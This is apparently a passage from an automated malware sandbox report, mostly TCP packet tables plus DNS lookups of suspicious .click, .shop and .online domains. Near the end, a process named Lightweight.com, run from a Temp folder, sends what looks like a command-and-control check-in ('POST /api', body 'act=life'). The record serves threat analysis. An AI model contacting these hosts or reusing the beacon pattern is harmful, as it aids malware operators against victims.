Dec 26, 2024 18:26:54.883276939 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.883281946 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.883363962 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.890217066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.890232086 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.890364885 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.890369892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.890428066 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.897367954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.897382975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.897440910 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.897445917 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.897494078 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.903704882 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.903719902 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.903793097 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.903798103 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.903837919 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.910284042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.910299063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.910378933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.910383940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.910425901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.917419910 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.917435884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.917510033 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.917515039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.917552948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.927638054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.927654028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.927759886 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:54.927764893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:54.927808046 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.086920023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.086935997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.087004900 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.087012053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.087074995 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.092052937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.092092991 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.092113972 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.092118979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.092147112 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.099040031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.099055052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.099117994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.099123955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.106216908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.106231928 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.106291056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.106297970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.112565994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.112580061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.112637043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.112642050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.119157076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.119170904 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.119225025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.119231939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.126282930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.126296043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.126354933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.126360893 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.133505106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.133517981 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.133594036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.133599997 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.183722973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.296766043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.296783924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.296860933 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.296885014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.296905041 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.296943903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.302645922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.302660942 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.302730083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.302747965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.302788973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.309499025 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.309513092 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.309562922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.309578896 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.309622049 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.316734076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.316747904 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.316817999 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.316833973 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.316893101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.322932005 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.322945118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.322998047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.323014021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.323055029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.330569983 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.330585003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.330629110 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.330642939 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.330693960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.336863995 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.336878061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.336930990 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.336946011 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.336987019 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.348185062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.348202944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.348278999 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.348297119 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.348314047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.348349094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.507394075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.507410049 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.507474899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.507498980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.507551908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.512860060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.512873888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.512923956 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.512933016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.512974977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.519958019 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.519970894 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.520037889 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.520051003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.520092010 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.527152061 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.527167082 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.527220011 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.527234077 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.527273893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.533488035 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.533503056 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.533551931 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.533565044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.533605099 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.541028023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.541042089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.541093111 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.541100979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.541138887 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.547337055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.547354937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.547404051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.547410965 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.547447920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.558948994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.558964014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.559010029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.559015989 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.559061050 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.717765093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.717788935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.719244003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.719244003 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.719264030 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.719336987 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.723279953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.723295927 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.723361015 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.723366976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.723413944 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.730669975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.730684042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.730742931 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.730748892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.730793953 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.737587929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.737610102 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.737653971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.737659931 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.737715960 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.743829966 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.743844986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.743904114 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.743910074 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.743953943 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.751486063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.751502037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.751560926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.751564980 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.751606941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.757790089 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.757807970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.757860899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.757865906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.757910967 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.769294024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.769315958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.769380093 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.769383907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.769428015 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.771239042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.928370953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.928400040 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.928448915 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.928457022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.928493977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.928517103 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.933937073 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.933958054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.933999062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.934003115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.934030056 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.934046984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.941102028 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.941122055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.941179037 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.941184998 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.941231012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.948261023 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.948280096 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.948316097 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.948321104 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.948348045 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.948367119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.955384016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.955404043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.955446005 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.955451012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.955472946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.955495119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.962089062 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.962110043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.962158918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.962162971 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.962205887 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.968516111 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.968535900 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.968585968 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.968590975 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.968642950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.979847908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.979870081 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.979923964 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:55.979928017 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:55.979974031 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.138928890 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.138957024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.139031887 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.139049053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.139066935 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.139105082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.144936085 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.144958019 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.145009995 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.145015955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.145064116 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.152179956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.152205944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.152239084 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.152244091 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.152273893 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.152290106 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.158497095 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.158515930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.158567905 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.158572912 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.158613920 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.160445929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.160499096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.166690111 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.166735888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.166743994 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.166750908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.166796923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.166801929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.166838884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.166848898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.166886091 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.184797049 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.184812069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:56.184822083 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:56.184828997 CET	443	49719	172.67.214.186	192.168.2.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 18:25:46.215816021 CET	49337	53	192.168.2.16	1.1.1.1
Dec 26, 2024 18:25:46.448079109 CET	53	49337	1.1.1.1	192.168.2.16
Dec 26, 2024 18:26:13.604159117 CET	50215	53	192.168.2.16	1.1.1.1
Dec 26, 2024 18:26:13.920167923 CET	53	50215	1.1.1.1	192.168.2.16
Dec 26, 2024 18:26:37.205328941 CET	63343	53	192.168.2.16	1.1.1.1
Dec 26, 2024 18:26:37.695780993 CET	53	63343	1.1.1.1	192.168.2.16
Dec 26, 2024 18:26:39.937535048 CET	51246	53	192.168.2.16	1.1.1.1
Dec 26, 2024 18:26:40.260569096 CET	53	51246	1.1.1.1	192.168.2.16
Dec 26, 2024 18:26:41.035145998 CET	58857	53	192.168.2.16	1.1.1.1
Dec 26, 2024 18:26:41.255564928 CET	53	58857	1.1.1.1	192.168.2.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 18:25:46.215816021 CET	192.168.2.16	1.1.1.1	0xfe18	Standard query (0)	MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:13.604159117 CET	192.168.2.16	1.1.1.1	0x5bb8	Standard query (0)	laborersquei.click	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:37.205328941 CET	192.168.2.16	1.1.1.1	0xbe6a	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:39.937535048 CET	192.168.2.16	1.1.1.1	0xb40b	Standard query (0)	klipsyzogey.shop	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:41.035145998 CET	192.168.2.16	1.1.1.1	0x6c4c	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 18:25:46.448079109 CET	1.1.1.1	192.168.2.16	0xfe18	Name error (3)	MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:13.920167923 CET	1.1.1.1	192.168.2.16	0x5bb8	No error (0)	laborersquei.click		172.67.166.49	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:13.920167923 CET	1.1.1.1	192.168.2.16	0x5bb8	No error (0)	laborersquei.click		104.21.89.250	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:37.695780993 CET	1.1.1.1	192.168.2.16	0xbe6a	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:40.260569096 CET	1.1.1.1	192.168.2.16	0xb40b	No error (0)	klipsyzogey.shop		172.67.214.186	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:40.260569096 CET	1.1.1.1	192.168.2.16	0xb40b	No error (0)	klipsyzogey.shop		104.21.23.250	A (IP address)	IN (0x0001)	false
Dec 26, 2024 18:26:41.255564928 CET	1.1.1.1	192.168.2.16	0x6c4c	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

laborersquei.click

cegu.shop

klipsyzogey.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49708	172.67.166.49	443	2920	C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Timestamp	Bytes transferred	Direction	Data
2024-12-26 17:26:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: laborersquei.click
2024-12-26 17:26:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 17:26:16 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 17:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cjq11fp95h1odmk2416f14c54k; expires=Mon, 21 Apr 2025 11:12:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJq8n25Tgzzopbw7t%2FZUDmwxUuWjyISAdn645xMooIS0vP%2FVQRBfphH%2F5Fmu0%2BBhKZWhKMazbvvRZUSY85Q3DYAwRGE3%2FhSEZzBTIbQiu%2FaXxcrC6jxpq4a1VJlX9J5xa%2BR9fQs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f82c65c9fc64213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1668&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1673352&cwnd=229&unsent_bytes=0&cid=35932be04360c77a&ts=1031&x=0"
2024-12-26 17:26:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 17:26:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
